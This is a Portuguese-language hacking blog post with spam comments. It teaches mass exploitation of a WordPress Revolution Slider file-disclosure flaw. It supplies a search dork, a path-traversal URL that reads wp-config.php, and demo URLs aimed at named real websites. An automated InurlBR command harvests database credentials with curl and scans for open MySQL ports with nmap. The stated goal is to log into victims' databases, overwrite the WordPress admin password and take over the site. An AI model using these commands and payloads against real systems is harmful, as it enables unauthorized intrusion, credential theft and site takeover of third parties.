Nesse tutorial mostro como vocês pode obter dados do mysql dos servidores vulneravel, ("E-Commerce") usando a google inurlbr para fazer as busca e deixando tudo organizado no bloco de notas, tambem fazendo uma verificação na posta do servidor, a porta 3306 a qual usaremos para nos conectar nor servidor, e assim tendo acesso a tabela de usuarios do wordpress, podendo fazer update da senha e colocando a nossa e assim logamos no painel.
[+] Titulo: Wordpress slider reolusion local file downloadPOC:
[+] Data: 25-01-2015
[+] Author: JOK3R
[+] Site Vendedor: https://wordpress.org/plugins/patch-for-revolution-slider/
[+] Testado em: windows 7 / firefox , kali linux / firefox
[+] Arquivos Vulneravel: /plugins/revolution-slider/
[+] Dork : "Index of" /wp-content/plugins/revolution-slider/
http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.phpDemo:
http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.phpCreditos:
http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS*Sobre SCANNER - INURLBR
And All iranian Hacker's And Exploiter's <3
[+] iran-cyber.in
GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.Outras Informações
SCRIPT NAME: INURLBR
AUTOR: Cleiton Pinheiro
Nick: Googleinurl
Blog: http://blog.inurl.com.br
twitter: /@googleinurl
facebook: /InurlBrasil Download: Script
Na Busca vamos usar a "Google InurlBR" que faz toda a busca de forma rapida e facil. Junto como o comando do NMAP, para verificar a porta 3306 se está aberta. (OBS, "Não significa a porta esteja aberta que você consiga entrar no MYSQL. Algums Servidores, devem está configurado para não acessa remotamente o servidor do MYSQL")
Busca Avançada com InurlBr + Nmap
Mude aqui para outros dominios em = site:br, site:com, site:uk... etc
Crie um pasta na sua area de trabalho com o nome " output " ou remova o caminho
Comando InurlBR
root@kali:~# php inurlbr.php --dork '"Index of" /wp-content/plugins/revolution-slider site:br' -q 1,6 -s ~/Desktop/output/wp-out.txt --exploit-get '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php' --comand-vul 'nmap -Pn -p 3306 _TARGET_' --comand-all 'echo "_TARGET__EXPLOIT_">> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'Video:
Wordpress_Revolution_Slider_Local_File_Disclosure - ECommerce from Mathew Thomas on Vimeo.
https://youtu.be/5rvOuPGLwuk?t=4m48s
Thanks for sharing this fabulous post. Writer explains it very smartly. Now I share something about forex signals. You need more data welcome to visit us forex signals
ResponderExcluirThanks visit us, i will forex visit us
ExcluirThanks for sharing this valuable info
ResponderExcluirThanks visit us
ExcluirThanks for all your efforts that you have put in this .
ResponderExcluirvery interesting information.
I would like to do all the information
Desktop And Laptops